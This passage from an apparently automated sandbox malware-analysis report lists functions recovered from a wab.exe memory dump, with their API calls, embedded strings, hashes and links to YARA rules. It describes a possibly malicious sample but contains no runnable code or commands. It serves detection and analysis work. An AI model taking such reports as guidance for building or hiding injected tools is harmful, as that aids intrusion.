                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                                                              • String ID:
                                                                                              • API String ID: 552707033-0
                                                                                              • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                              • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                                                                              • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                              • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040C084 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 110stringfileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,0040C255,?,?,*.*,0040C2BF,00000000), ref: 0040C0A4
                                                                                                • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                              • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                                                                                • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                                                                                • Part of subcall function 0040BFF3: memcpy.MSVCRT ref: 0040C024
                                                                                              • memcpy.MSVCRT ref: 0040C11B
                                                                                              • strchr.MSVCRT ref: 0040C140
                                                                                              • strchr.MSVCRT ref: 0040C151
                                                                                              • _strlwr.MSVCRT ref: 0040C15F
                                                                                              • memset.MSVCRT ref: 0040C17A
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
                                                                                              • String ID: 4$h
                                                                                              • API String ID: 4066021378-1856150674
                                                                                              • Opcode ID: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                                              • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                                                                                              • Opcode Fuzzy Hash: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                                              • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00414621 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 99COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memset$_snwprintf
                                                                                              • String ID: %%0.%df
                                                                                              • API String ID: 3473751417-763548558
                                                                                              • Opcode ID: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                                                              • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                                                                                              • Opcode Fuzzy Hash: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                                                              • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004060A4 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97timewindowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                                                                              • KillTimer.USER32(?,00000041), ref: 004060D7
                                                                                              • KillTimer.USER32(?,00000041), ref: 004060E8
                                                                                              • GetTickCount.KERNEL32 ref: 0040610B
                                                                                              • GetParent.USER32(?), ref: 00406136
                                                                                              • SendMessageW.USER32(00000000), ref: 0040613D
                                                                                              • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                                                                              • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                                                                              • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                                                              • String ID: A
                                                                                              • API String ID: 2892645895-3554254475
                                                                                              • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                              • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                                                                                              • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                              • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040D957 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • LoadMenuW.USER32(?,?), ref: 0040D97F
                                                                                                • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                                                                                                • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                                                                                                • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                                                                                                • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                                                                                              • DestroyMenu.USER32(00000000), ref: 0040D99D
                                                                                              • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                                                                                              • GetDesktopWindow.USER32 ref: 0040D9FD
                                                                                              • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                                                                                              • memset.MSVCRT ref: 0040DA23
                                                                                              • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                                                                                              • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                                                                                              • DestroyWindow.USER32(00000005), ref: 0040DA70
                                                                                                • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                                                              • String ID: caption
                                                                                              • API String ID: 973020956-4135340389
                                                                                              • Opcode ID: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                                                              • Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
                                                                                              • Opcode Fuzzy Hash: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                                                              • Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00410A60 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 90COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                                                                                              • <table dir="rtl"><tr><td>, xrefs: 00410B00
                                                                                              • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                                                                                              • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memset$_snwprintf$wcscpy
                                                                                              • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                                              • API String ID: 1283228442-2366825230
                                                                                              • Opcode ID: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                                                              • Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
                                                                                              • Opcode Fuzzy Hash: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                                                              • Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00413959 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 82COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • wcschr.MSVCRT ref: 00413972
                                                                                              • wcscpy.MSVCRT ref: 00413982
                                                                                                • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                                • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                                • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                              • wcscpy.MSVCRT ref: 004139D1
                                                                                              • wcscat.MSVCRT ref: 004139DC
                                                                                              • memset.MSVCRT ref: 004139B8
                                                                                                • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                                                                                                • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                                                                                              • memset.MSVCRT ref: 00413A00
                                                                                              • memcpy.MSVCRT ref: 00413A1B
                                                                                              • wcscat.MSVCRT ref: 00413A27
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                                                              • String ID: \systemroot
                                                                                              • API String ID: 4173585201-1821301763
                                                                                              • Opcode ID: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                                                              • Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
                                                                                              • Opcode Fuzzy Hash: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                                                              • Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00414BB0 Relevance: 16.6, APIs: 1, Strings: 10, Instructions: 50COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: wcscpy
                                                                                              • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                                                              • API String ID: 1284135714-318151290
                                                                                              • Opcode ID: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                                                                                              • Instruction ID: e2253d4fd864bfabc2f945990654e2d0feb0e3e4f5de9ed447e77a37a808a444
                                                                                              • Opcode Fuzzy Hash: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                                                                                              • Instruction Fuzzy Hash: 04F0127526EA4161142406240E0DEF75509D0D575F3F74A537A02E89D6FCCDDEC6609F
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040D2AB Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                                                              • String ID: 0$6
                                                                                              • API String ID: 4066108131-3849865405
                                                                                              • Opcode ID: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                                              • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                                                                              • Opcode Fuzzy Hash: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                                              • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004082C7 Relevance: 15.2, APIs: 10, Instructions: 229COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 004082EF
                                                                                                • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                              • memset.MSVCRT ref: 00408362
                                                                                              • memset.MSVCRT ref: 00408377
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memset$ByteCharMultiWide
                                                                                              • String ID:
                                                                                              • API String ID: 290601579-0
                                                                                              • Opcode ID: 0f4830a1bd5c139c57c95e775b3a7e0dd93a0ba2de61a1ec6096e44496360a03
                                                                                              • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                                                                              • Opcode Fuzzy Hash: 0f4830a1bd5c139c57c95e775b3a7e0dd93a0ba2de61a1ec6096e44496360a03
                                                                                              • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00444E84 Relevance: 15.2, APIs: 8, Strings: 2, Instructions: 183COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcpy$memchrmemset
                                                                                              • String ID: PD$PD
                                                                                              • API String ID: 1581201632-2312785699
                                                                                              • Opcode ID: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                                                                                              • Instruction ID: 10fb1f61a141a907ee6ef334180a592a84e160db04a0c58349e49e3250f7ff3f
                                                                                              • Opcode Fuzzy Hash: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                                                                                              • Instruction Fuzzy Hash: 8D5192719002196BDF10EF69CC85EEEBBBCAF45304F0444ABE555E7246E738E648CBA4
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00409F42 Relevance: 15.1, APIs: 10, Instructions: 103COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetSystemMetrics.USER32(00000011), ref: 00409F5B
                                                                                              • GetSystemMetrics.USER32(00000010), ref: 00409F61
                                                                                              • GetDC.USER32(00000000), ref: 00409F6E
                                                                                              • GetDeviceCaps.GDI32(00000000,00000008), ref: 00409F7F
                                                                                              • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00409F86
                                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 00409F8D
                                                                                              • GetWindowRect.USER32(?,?), ref: 00409FA0
                                                                                              • GetParent.USER32(?), ref: 00409FA5
                                                                                              • GetWindowRect.USER32(00000000,00000000), ref: 00409FC2
                                                                                              • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040A021
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                                                                              • String ID:
                                                                                              • API String ID: 2163313125-0
                                                                                              • Opcode ID: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                                              • Instruction ID: e27d49e141fc924f5dc8bb17b5c2b7dfe0ac862298cc10f95babd1b5c1aaa95e
                                                                                              • Opcode Fuzzy Hash: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                                              • Instruction Fuzzy Hash: 66318475A00209AFDF14CFB9CD85AEEBBB9FB48354F050579E901F3290DA70ED458A50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004028E7 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 190COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??3@$wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 239872665-3916222277
                                                                                              • Opcode ID: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                                                                                              • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                                                                                              • Opcode Fuzzy Hash: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                                                                                              • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040A45A Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 65COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcpywcslen$_snwprintfmemset
                                                                                              • String ID: %s (%s)$YV@
                                                                                              • API String ID: 3979103747-598926743
                                                                                              • Opcode ID: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                                                              • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                                                                                              • Opcode Fuzzy Hash: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                                                              • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040A661 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52librarywindowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,?,?,?,00409764,?), ref: 0040A686
                                                                                              • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6A4
                                                                                              • wcslen.MSVCRT ref: 0040A6B1
                                                                                              • wcscpy.MSVCRT ref: 0040A6C1
                                                                                              • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6CB
                                                                                              • wcscpy.MSVCRT ref: 0040A6DB
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                                              • String ID: Unknown Error$netmsg.dll
                                                                                              • API String ID: 2767993716-572158859
                                                                                              • Opcode ID: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                                                              • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                                                                                              • Opcode Fuzzy Hash: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                                                              • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040DAE1 Relevance: 14.0, APIs: 3, Strings: 5, Instructions: 42COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                              • wcscpy.MSVCRT ref: 0040DAFB
                                                                                              • wcscpy.MSVCRT ref: 0040DB0B
                                                                                              • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                                                                                                • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: PrivateProfilewcscpy$AttributesFileString
                                                                                              • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                              • API String ID: 3176057301-2039793938
                                                                                              • Opcode ID: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                                                                              • Instruction ID: a06b33177ff8c9e83df2ed587696004ed0fecc3b70d630751f385571f4afffd7
                                                                                              • Opcode Fuzzy Hash: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                                                                              • Instruction Fuzzy Hash: A8F0F661EC061236D2213A761C07F2E26149FA3B93F05447BBC08771C7CA7E4A4DC69E
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0042F5F4 Relevance: 13.8, APIs: 2, Strings: 7, Instructions: 250COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              • database %s is already in use, xrefs: 0042F6C5
                                                                                              • unable to open database: %s, xrefs: 0042F84E
                                                                                              • database is already attached, xrefs: 0042F721
                                                                                              • cannot ATTACH database within transaction, xrefs: 0042F663
                                                                                              • out of memory, xrefs: 0042F865
                                                                                              • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                                                                              • too many attached databases - max %d, xrefs: 0042F64D
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcpymemset
                                                                                              • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                              • API String ID: 1297977491-2001300268
                                                                                              • Opcode ID: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                                                                                              • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                                                                                              • Opcode Fuzzy Hash: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                                                                                              • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040EAFF Relevance: 13.7, APIs: 7, Strings: 2, Instructions: 160COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8EC
                                                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8FA
                                                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E90B
                                                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E922
                                                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E92B
                                                                                              • ??2@YAPAXI@Z.MSVCRT ref: 0040EB3F
                                                                                              • ??2@YAPAXI@Z.MSVCRT ref: 0040EB5B
                                                                                              • memcpy.MSVCRT ref: 0040EB80
                                                                                              • memcpy.MSVCRT ref: 0040EB94
                                                                                              • ??2@YAPAXI@Z.MSVCRT ref: 0040EC17
                                                                                              • ??2@YAPAXI@Z.MSVCRT ref: 0040EC21
                                                                                              • ??2@YAPAXI@Z.MSVCRT ref: 0040EC59
                                                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                                                                                • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                                                              • String ID: ($d
                                                                                              • API String ID: 1140211610-1915259565
                                                                                              • Opcode ID: 2d8781ba105db3adf58cafe694f4c442d3862c9e44634e011589b3902fbf09db
                                                                                              • Instruction ID: 92dd2811bdb74a70ba85f750b5b6098557f3982e7a927aadba8bcdb4291d1afd
                                                                                              • Opcode Fuzzy Hash: 2d8781ba105db3adf58cafe694f4c442d3862c9e44634e011589b3902fbf09db
                                                                                              • Instruction Fuzzy Hash: D7518D71601704AFD724DF2AC586A5AB7F8FF48314F10892EE55ACB381DB75E9408B48
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00417887 Relevance: 13.6, APIs: 9, Instructions: 126filesleepCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                                                                                              • Sleep.KERNEL32(00000001), ref: 004178E9
